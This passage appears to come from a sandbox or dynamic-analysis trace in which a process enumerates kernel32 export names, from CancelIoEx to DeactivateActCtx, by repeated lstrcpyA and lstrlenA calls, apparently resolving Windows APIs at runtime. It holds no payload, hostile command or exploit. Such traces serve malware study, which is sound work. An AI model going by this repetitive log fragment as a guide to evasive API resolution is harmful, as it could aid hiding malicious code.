lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.160] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.160] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.160] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.160] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.160] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.160] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.160] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.160] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.160] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.160] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.160] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.161] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.161] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.161] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.161] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.161] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.161] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.161] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.161] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.161] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.161] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.161] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.161] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.161] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.161] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.161] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.162] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.162] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.162] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.162] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.162] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.162] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.162] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.162] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.162] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.162] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.162] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.162] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.162] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.162] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.162] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.162] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.162] lstrlenA (lpString="COPYFILEA") returned 9 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.162] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.162] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.163] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.163] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.163] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.163] lstrlenA (lpString="COPYFILEW") returned 9 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.163] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.163] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.163] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.163] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.163] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.163] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.163] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.163] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.163] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.163] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.163] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.163] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.163] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.163] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.163] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.163] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.164] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.164] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.164] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.164] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.164] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.164] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.164] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.164] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.164] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.164] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.164] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.164] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.164] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.164] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.164] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.164] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.164] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.164] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.164] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.164] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.165] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.165] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.165] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.165] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.165] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.165] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.165] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.165] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.165] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.165] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.165] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.165] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.165] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.165] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.165] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.165] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.165] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.165] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.165] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.165] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.166] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.166] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.166] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.166] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.166] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.166] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.166] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.166] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.166] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.166] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.166] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.166] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.166] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.166] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.166] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.166] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.166] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.166] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.166] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.167] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.167] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.167] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.167] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.167] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.167] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.167] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.167] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.167] lstrlenA (lpString="DEACTIVATEACTCTX") returned 